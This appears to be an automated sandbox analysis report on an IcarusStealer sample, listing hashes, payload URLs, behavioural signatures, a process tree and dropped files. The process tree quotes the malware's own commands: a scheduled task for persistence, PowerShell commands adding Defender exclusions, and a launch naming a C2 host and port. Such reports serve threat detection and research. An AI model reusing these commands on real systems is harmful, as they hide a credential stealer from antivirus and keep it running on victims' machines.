Overview

overview

10

Static

static

3

custom1.exe

windows7-x64

10

custom1.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    97s
  • max time network
    165s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13/03/2024, 20:43

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    custom1.exe

  • Size

    24.9MB

  • MD5

    4e1c29f0c1af62ddea916c6b80548c76

  • SHA1

    38d9f15356b6a65f4e76ee739867d55b01493793

  • SHA256

    13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882

  • SHA512

    f863e54437a36b53f91057f74bdbfcaed90c93256333afe978be5f7b73b417a74084d3a92afe4b6ceea96fd909997cf22b30612c43d6d0d27c64c0bba7db9c28

  • SSDEEP

    49152:lfRW10dDWeHzJhNF/CBpOqqUe00zCMe8KfFo:lfw1yaeHLNF/22UwCL8yF

Score
10/10
icarusstealerpersistencestealer

Malware Config

Extracted

Family

icarusstealer

Attributes
  • payload_url

    https://blackhatsec.org/add.jpg

    https://blackhatsec.org/remove.jpg

Signatures

  • IcarusStealer

    Icarus is a modular stealer written in C# First adverts in July 2022.

    stealericarusstealer
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
    persistence
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 6 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
    adwarespyware
  • Modifies registry class 35 IoCs
  • Suspicious behavior: EnumeratesProcesses 53 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 32 IoCs
  • Suspicious use of FindShellTrayWindow 49 IoCs
  • Suspicious use of SendNotifyMessage 23 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\custom1.exe
    "C:\Users\Admin\AppData\Local\Temp\custom1.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2096
    • C:\Users\Admin\AppData\Local\Temp\Client.exe
      "C:\Users\Admin\AppData\Local\Temp\Client.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3328
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3416
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"'
          4⤵
          • Creates scheduled task(s)
          PID:3620
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD491.tmp.bat""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:720
        • C:\Windows\SysWOW64\timeout.exe
          timeout 3
          4⤵
          • Delays execution with timeout.exe
          PID:3148
        • C:\Windows\System32\CatRoot\$SXR\$SXR.exe
          "C:\Windows\System32\CatRoot\$SXR\$SXR.exe"
          4⤵
          • Executes dropped EXE
          • Drops file in System32 directory
          • Suspicious use of AdjustPrivilegeToken
          PID:1664
    • C:\Users\Admin\AppData\Local\Temp\switched.exe
      "C:\Users\Admin\AppData\Local\Temp\switched.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4772
      • C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
        "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of WriteProcessMemory
        PID:5084
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4988
          • C:\Windows\system32\certutil.exe
            certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
            5⤵
              PID:4456
            • C:\Windows\system32\find.exe
              find /i /v "md5"
              5⤵
                PID:2128
              • C:\Windows\system32\find.exe
                find /i /v "certutil"
                5⤵
                  PID:2092
            • C:\Users\Admin\AppData\Local\Temp\tesetey.exe
              "C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
              3⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2748
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2h0tmndg\2h0tmndg.cmdline"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:836
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF0F3.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC2975F020235B40619046F421B9BDE2F1.TMP"
                  5⤵
                    PID:3516
                • C:\Windows\explorer.exe
                  "C:\Windows\explorer.exe"
                  4⤵
                  • Modifies Installed Components in the registry
                  • Enumerates connected drives
                  • Checks SCSI registry key(s)
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:1092
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
                  4⤵
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:620
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
                    5⤵
                      PID:4472
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                        6⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3872
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4604
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
                        6⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3904
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\YourPhone.exe & exit
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1956
                    • C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
                      C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
                      5⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:5024
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4072 --field-trial-handle=2272,i,4858140932023865871,5726683989663339295,262144 --variations-seed-version /prefetch:8
              1⤵
                PID:3524
              • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                1⤵
                • Modifies registry class
                • Suspicious use of SetWindowsHookEx
                PID:2108
              • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                1⤵
                • Modifies Internet Explorer settings
                • Modifies registry class
                • Suspicious use of SetWindowsHookEx
                PID:3816
              • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                1⤵
                  PID:5744
                • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                  1⤵
                    PID:3128
                  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                    1⤵
                      PID:4788
                    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                      1⤵
                        PID:5932

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                        Filesize

                        2KB

                        MD5

                        968cb9309758126772781b83adb8a28f

                        SHA1

                        8da30e71accf186b2ba11da1797cf67f8f78b47c

                        SHA256

                        92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

                        SHA512

                        4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        Filesize

                        16KB

                        MD5

                        e9c53e8ff4e934a22c346225d48454b0

                        SHA1

                        2d46b4f4ff4cf4411f216b51b551397778862b7f

                        SHA256

                        84ea7724f11ef4a4a9d116be617a8148ece74b1ec7a598304d29f201197d795c

                        SHA512

                        f09c8e3fdef9d569a596f57bf369413871a17bed99b5a49eabb874766a3d3ea7284033cfa61333a5f62facc87d96666db9a2d23c2e23302a6fbe02f00f864749

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\TokenBroker\Cache\fbaf94e759052658216786bfbabcdced1b67a5c2.tbres
                        Filesize

                        2KB

                        MD5

                        3a961658940a15ae96b67c3370290694

                        SHA1

                        5949a410a22f7a23d571adad8d11cb43c0783ef8

                        SHA256

                        9ca2a8b574d855c69b01010c668d12d132a60c66f91fdd2a689bb7fc716736c4

                        SHA512

                        dbcedec9eeaec9c7ff6dc8cb7d85df3ffb446e9e9807517713074787219560c333617c28459a6d387e5307e805bd107b64f9f019b3e1ba4dd6244cb739ed0831

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\5MIHM5LV\microsoft.windows[1].xml
                        Filesize

                        96B

                        MD5

                        84209e171da10686915fe7efcd51552d

                        SHA1

                        6bf96e86a533a68eba4d703833de374e18ce6113

                        SHA256

                        04d6050009ea3c99cc718ad1c07c5d15268b459fcfb63fcb990bc9761738907b

                        SHA512

                        48d2524000911cfb68ef866dedac78ee430d79aa3f4b68399f645dc2066841e6962e11a3362cbcec46680357dcd3e58cfef9994450fed1d8af04df44f76b0dfd

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\Client.exe
                        Filesize

                        6.8MB

                        MD5

                        e0c9c2f8d84fbfa6da94534139fb956a

                        SHA1

                        eafed8208b616a71c7cb7f7fc4ff8ad4441d9d7c

                        SHA256

                        15e242be34a5ff7adf86bde1fdd4a84a26907457f74a814cd8d640a0b9fd400e

                        SHA512

                        1c75885d74f2542eda749e47f16956fd8dd4e71a12d3dec9b4b6e36ed1094577cc9b286f5ed9b579d12012d61a50aa4e23c496f297eb29beea5b1a3d3a03fd00

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\Client.exe
                        Filesize

                        19.0MB

                        MD5

                        079932a25e8f1deff7b579ab01c6bbd9

                        SHA1

                        93122014cb3eb482e35cc0231658f26e24515c13

                        SHA256

                        7db35c1fece6bba589e0a928f8e69287617d49ab692847dbce2b42d9b7757036

                        SHA512

                        b8816b4c26b57e22c68d114901fafed875d77a44c583bffb658be05c68272cc329f0f4e9b56f844c9dc8dc4d012610a4bcefc6ecf35933fdfc6d1eb088521971

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\Client.exe
                        Filesize

                        11.6MB

                        MD5

                        567132382f9fa5b4dd4408611813e66b

                        SHA1

                        164f2f635a367ff8fb576d77efcc7c670e2c1b7c

                        SHA256

                        6cd0a422c7e43c6bb9864a3cdc6e78f46a0f6432092a8c16986fda4bcbee5afe

                        SHA512

                        6cd27bc8711fa755cb9102ff13446527f5c35bd27b1773b3b1ea965330e43f613707054f4d6fe05639f3db52943903d5a689f4f89b1a0eede9a4ae8a991d06fe

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\RESF0F3.tmp
                        Filesize

                        1KB

                        MD5

                        de68c1474a7fac85ab00b7332f25f9f9

                        SHA1

                        f54c488a31c99c26f06756c3f34323dbaeb6eea5

                        SHA256

                        a8088593f6e1103ca417978c3f44df2e18d593c0af5beaec660630840124de80

                        SHA512

                        ac49d16bc0351c80eba7db406026ffc387730d39b9b4599d422c7e63bc43f32b47fa93b71bdf9b6c7defe38c81437e55305ec9cbeac55cee89739f9296aff6fa

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
                        Filesize

                        4KB

                        MD5

                        e343ebbe4a22b788d37609bc06564d4d

                        SHA1

                        a5f9fa1cf2f57ac8de19853ede9711dea8ec64c5

                        SHA256

                        92d33770dce86987419578eee3c35aac13beff4ad68af46896b88adab7835e34

                        SHA512

                        79515ac5491a73333aba4350f8a4af04424c4b6083258b86be47b78b1404e3c24f65843f89528aa2de98c33174c4462a45d4a6710a240bb33f0fa16cce0863d2

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2h02jh5f.mpd.ps1
                        Filesize

                        60B

                        MD5

                        d17fe0a3f47be24a6453e9ef58c94641

                        SHA1

                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                        SHA256

                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                        SHA512

                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
                        Filesize

                        1.8MB

                        MD5

                        4499247f8a1dbfbf206b47fa1578ce86

                        SHA1

                        c81e655c340c0b0507b6cd48489fce94a1c035e6

                        SHA256

                        c4a53516a5d85bd8cdf943a3ebe14ab74d426f1423a78b4759b3881192fa85c3

                        SHA512

                        6ac051de57e3089284a29a36a9ee5d645dd5fbb190b2d4ce17c8a9c1c8760aa9d1dced701f3c264c7eec1fb01c3b765c5213b0195c3f0feb8651ce8e32285ab2

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
                        Filesize

                        1024KB

                        MD5

                        21f9fda30a7dc1b7721f6e1d7286733d

                        SHA1

                        6390daaecea89fb589c4d0f77c3c870a77f0ea7c

                        SHA256

                        759352271ee18e0b8d1fc690e2e9538cdd87974e3733849fd03116e87947b7c7

                        SHA512

                        00034cf5769b08bdcd9b7fa666f43ad17a5fefabbfcf5b079619a4092f9006773c0eb9e3c15edbc8c446f0d97a1b385fd55cb85678314c40f54d73ee2b1b9857

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
                        Filesize

                        1.1MB

                        MD5

                        c5c6f01648cb80c43db86320383559ae

                        SHA1

                        68262910d7edf6ed9dfa8d31e9888de7ac27bce3

                        SHA256

                        42eb6a04d7a1c7a551c97cc2633f14d44f11d1e62a749f10420ac8b69d3fdc7a

                        SHA512

                        b6790592463171fa93a40fab1b68cab03e1ab780528999db0800190d4ef9c7866063f933cc16fe73b0b0a78a79dbb594e59c4dbd49a6b7b68a8e8284c208cc7a

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\switched.exe
                        Filesize

                        3.7MB

                        MD5

                        b9bbe31d276de5c3d05352d070ae4244

                        SHA1

                        5e1bb67b01c579b4e0ad5a7475ceb657201c27ec

                        SHA256

                        a01977e758a85dc01fb8ca7da9110adfe5bf9b9bec0af1db82741fe83d20408d

                        SHA512

                        0a3459690bfdf8d238cb6f27c650903659c12aa589bcba037a45c68287342f53ca5c1e1b307a0abd8d481f79e3df6bd994cce6a79258343627aa7b3209b0ed17

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\switched.exe
                        Filesize

                        590KB

                        MD5

                        66055c095ade309bc3e86611856f9298

                        SHA1

                        382287c77db510c94f35d59c2f83b91d34a556d8

                        SHA256

                        3037d7e51c7f50f01c2bc2848e68a24d9332e09dc0a3c1ad0deac5bfb611dc5a

                        SHA512

                        dc64aa3e96d84b9ba49102e394308e84fc803ac38b9a56c1bb92ba16e4d8a256da266a00cd2200a9b539a12a3051f85056cedcfdb986424389abfe5e6bd3342a

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\switched.exe
                        Filesize

                        960KB

                        MD5

                        d3f74ed152e0e87a0bb575f989d51d1e

                        SHA1

                        b2060ae4f59458e83d9eb33ebd586b9ca69431df

                        SHA256

                        048420d128a90ac1c11fc84f59c6cedd7c5a7ca441ea1821230ec9814b0d5ec9

                        SHA512

                        b69f241e3dd3767f9b4bec8e2b5ac2d4d3af580c28858254c3aefa06435c41f1099471fd077f73c91848290d760ac2bc4e5783dd30f00738615d55468f7eb743

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\tesetey.exe
                        Filesize

                        494KB

                        MD5

                        0f0838bc6642dd6bc603368e50b4aba3

                        SHA1

                        932bd4d1c11996bf8ac3ac74a94b266e96d44c36

                        SHA256

                        4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9

                        SHA512

                        a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\tmpD491.tmp.bat
                        Filesize

                        150B

                        MD5

                        64889e5bb391de732398c448f2af4061

                        SHA1

                        9f6908aa0536a92f60a8e9dd6622ee46e97f196d

                        SHA256

                        69448013960fc05e59a42741082cd01aa8cc614eda6ef59229a30a854893d665

                        SHA512

                        df2db3464839cc879881178d65cb944ffd1418ea7db4618ae0c3c2c20ca194fca12a79797a9d3150b497a12bc4e45f2535af28b4cfa0ebe27951a68c19910391

                        Download Submit

                      • C:\Windows\System32\CatRoot\$SXR\$SXR.exe
                        Filesize

                        816KB

                        MD5

                        828c4c95464f8e886cf8a0b230e425e8

                        SHA1

                        d9a82b4f2033f116fa09e27d13d239fc7ac04712

                        SHA256

                        c52206c900171b3ffaa7ef974737152ad543141f7eb860218d7c98311c43d8c3

                        SHA512

                        215f8b55d37e5060aa048d99b13ed3920d077253c5ef1eaba29f38e5a09f3b01d02d64f93b78eed881aa56c5041e3eb3cf7f145d638706349d284ae3734086bd

                        Download Submit

                      • C:\Windows\System32\CatRoot\$SXR\$SXR.exe
                        Filesize

                        465KB

                        MD5

                        46239ff9d7d818df84647561b35e6e80

                        SHA1

                        38d65f740f4e524d464e7af472a03e4a16d10f73

                        SHA256

                        5c9a5081869bc49be35963c191c86bd583988e265eeb936f71ac55652fc25d3f

                        SHA512

                        48b454e374423dce1dbfa5dbb48e50c629a5cfa05566ea7b4d303271efe3b01366f93df67e7c2c9165f3c5ac746dff0e98997a66c423788ae15d82ed48b97323

                        Download Submit

                      • C:\Windows\System32\CatRoot\$SXR\Read.txt
                        Filesize

                        58B

                        MD5

                        79668a6729f0f219835c62c9e43b7927

                        SHA1

                        0cbbc7cc8dbd27923b18285960640f3dad96d146

                        SHA256

                        6f5747973e572dc3ec0ae4fd9eaf57263abb01c36b35fcddf96e89208b16496e

                        SHA512

                        bc3895b46db46617315ffaa2ec5e2b44b06e1d4921834be25e1b60b12f2fba900f0f496070eb9f362952abcfa0b3b359bf1ced7da5ec0db63541e0977e6ea4e3

                        Download Submit

                      • \??\c:\Users\Admin\AppData\Local\Temp\2h0tmndg\2h0tmndg.0.cs
                        Filesize

                        1KB

                        MD5

                        14846c9faaef9299a1bf17730f20e4e6

                        SHA1

                        8083da995cfaa0e8e469780e32fcff1747850eb6

                        SHA256

                        61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b

                        SHA512

                        549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

                        Download Submit

                      • \??\c:\Users\Admin\AppData\Local\Temp\2h0tmndg\2h0tmndg.cmdline
                        Filesize

                        451B

                        MD5

                        5db4bfd7c739b02b7cef91d3d8a9d60c

                        SHA1

                        e6c05674f1c1e1e012b6726de150e702c14ffbe3

                        SHA256

                        9ad9711f462a96034bfd4a350479506b78bfedb67be42c56e2e667bf8205f665

                        SHA512

                        6f87cdcbb4ada68260c819e93b8bce391c52df72255ec635b9f3e2cca030fc9f59499921a6f772e0dc478363d94d9b5c884f779385e91f598ac00b250fea8da2

                        Download Submit

                      • \??\c:\Users\Admin\AppData\Local\Temp\CSC2975F020235B40619046F421B9BDE2F1.TMP
                        Filesize

                        1KB

                        MD5

                        1d5543c367c49b9dd6366270fdd4ee3a

                        SHA1

                        bf1e4c9b270125c4fd6fba63cf9fa92c5b3b8e66

                        SHA256

                        502b03046eea75f154cee0da9adfb6ca501704b97ef7ac5053de8f0f9f92d4d2

                        SHA512

                        86c864acdf3b4b457128889d37d6aad9190c53be059f30c7975adc7966c1aaa0b695ed22599aa5f63b2e44c8f5411f861db08b20c9909f4b934c852f064efa04

                        Download Submit

                      • memory/620-84-0x0000000005850000-0x0000000005860000-memory.dmp

                        Filesize

                        64KB

                        Download

                      • memory/620-196-0x0000000005850000-0x0000000005860000-memory.dmp

                        Filesize

                        64KB

                        Download

                      • memory/620-77-0x0000000073930000-0x00000000740E0000-memory.dmp

                        Filesize

                        7.7MB

                        Download

                      • memory/620-142-0x0000000073930000-0x00000000740E0000-memory.dmp

                        Filesize

                        7.7MB

                        Download

                      • memory/620-76-0x0000000000400000-0x0000000000424000-memory.dmp

                        Filesize

                        144KB

                        Download

                      • memory/1092-117-0x0000000003000000-0x0000000003001000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1664-139-0x0000000073930000-0x00000000740E0000-memory.dmp

                        Filesize

                        7.7MB

                        Download

                      • memory/1664-68-0x0000000073930000-0x00000000740E0000-memory.dmp

                        Filesize

                        7.7MB

                        Download

                      • memory/2748-41-0x0000000000490000-0x0000000000512000-memory.dmp

                        Filesize

                        520KB

                        Download

                      • memory/2748-45-0x0000000005010000-0x0000000005020000-memory.dmp

                        Filesize

                        64KB

                        Download

                      • memory/2748-39-0x0000000073930000-0x00000000740E0000-memory.dmp

                        Filesize

                        7.7MB

                        Download

                      • memory/2748-78-0x0000000005010000-0x0000000005020000-memory.dmp

                        Filesize

                        64KB

                        Download

                      • memory/2748-56-0x0000000073930000-0x00000000740E0000-memory.dmp

                        Filesize

                        7.7MB

                        Download

                      • memory/2748-95-0x0000000073930000-0x00000000740E0000-memory.dmp

                        Filesize

                        7.7MB

                        Download

                      • memory/2748-43-0x0000000004DD0000-0x0000000004E6C000-memory.dmp

                        Filesize

                        624KB

                        Download

                      • memory/2748-44-0x0000000004E70000-0x0000000004F02000-memory.dmp

                        Filesize

                        584KB

                        Download

                      • memory/2748-46-0x00000000069E0000-0x0000000006F84000-memory.dmp

                        Filesize

                        5.6MB

                        Download

                      • memory/3128-207-0x000001CBF6DA0000-0x000001CBF6DC0000-memory.dmp

                        Filesize

                        128KB

                        Download

                      • memory/3128-204-0x000001CBF6DE0000-0x000001CBF6E00000-memory.dmp

                        Filesize

                        128KB

                        Download

                      • memory/3128-210-0x000001CBF71B0000-0x000001CBF71D0000-memory.dmp

                        Filesize

                        128KB

                        Download

                      • memory/3328-64-0x0000000073930000-0x00000000740E0000-memory.dmp

                        Filesize

                        7.7MB

                        Download

                      • memory/3328-52-0x0000000006280000-0x00000000062A2000-memory.dmp

                        Filesize

                        136KB

                        Download

                      • memory/3328-42-0x0000000000FE0000-0x0000000001620000-memory.dmp

                        Filesize

                        6.2MB

                        Download

                      • memory/3328-53-0x0000000006320000-0x0000000006386000-memory.dmp

                        Filesize

                        408KB

                        Download

                      • memory/3328-40-0x0000000073930000-0x00000000740E0000-memory.dmp

                        Filesize

                        7.7MB

                        Download

                      • memory/3328-58-0x0000000073930000-0x00000000740E0000-memory.dmp

                        Filesize

                        7.7MB

                        Download

                      • memory/3816-123-0x000001F194CE0000-0x000001F194D00000-memory.dmp

                        Filesize

                        128KB

                        Download

                      • memory/3816-125-0x000001F194CA0000-0x000001F194CC0000-memory.dmp

                        Filesize

                        128KB

                        Download

                      • memory/3816-129-0x000001F195380000-0x000001F1953A0000-memory.dmp

                        Filesize

                        128KB

                        Download

                      • memory/3872-227-0x0000000073930000-0x00000000740E0000-memory.dmp

                        Filesize

                        7.7MB

                        Download

                      • memory/3872-116-0x0000000006250000-0x00000000065A4000-memory.dmp

                        Filesize

                        3.3MB

                        Download

                      • memory/3872-96-0x0000000006070000-0x00000000060D6000-memory.dmp

                        Filesize

                        408KB

                        Download

                      • memory/3872-236-0x0000000073930000-0x00000000740E0000-memory.dmp

                        Filesize

                        7.7MB

                        Download

                      • memory/3872-228-0x0000000005270000-0x0000000005280000-memory.dmp

                        Filesize

                        64KB

                        Download

                      • memory/3872-92-0x00000000058B0000-0x0000000005ED8000-memory.dmp

                        Filesize

                        6.2MB

                        Download

                      • memory/3872-193-0x0000000007B10000-0x0000000007B1A000-memory.dmp

                        Filesize

                        40KB

                        Download

                      • memory/3872-141-0x0000000005270000-0x0000000005280000-memory.dmp

                        Filesize

                        64KB

                        Download

                      • memory/3872-225-0x0000000007D20000-0x0000000007D3A000-memory.dmp

                        Filesize

                        104KB

                        Download

                      • memory/3872-223-0x0000000007CC0000-0x0000000007CCE000-memory.dmp

                        Filesize

                        56KB

                        Download

                      • memory/3872-143-0x0000000006C00000-0x0000000006C32000-memory.dmp

                        Filesize

                        200KB

                        Download

                      • memory/3872-146-0x0000000070770000-0x00000000707BC000-memory.dmp

                        Filesize

                        304KB

                        Download

                      • memory/3872-94-0x0000000005FD0000-0x0000000005FF2000-memory.dmp

                        Filesize

                        136KB

                        Download

                      • memory/3872-191-0x00000000080E0000-0x000000000875A000-memory.dmp

                        Filesize

                        6.5MB

                        Download

                      • memory/3872-166-0x000000007FCD0000-0x000000007FCE0000-memory.dmp

                        Filesize

                        64KB

                        Download

                      • memory/3872-90-0x0000000073930000-0x00000000740E0000-memory.dmp

                        Filesize

                        7.7MB

                        Download

                      • memory/3904-220-0x0000000073930000-0x00000000740E0000-memory.dmp

                        Filesize

                        7.7MB

                        Download

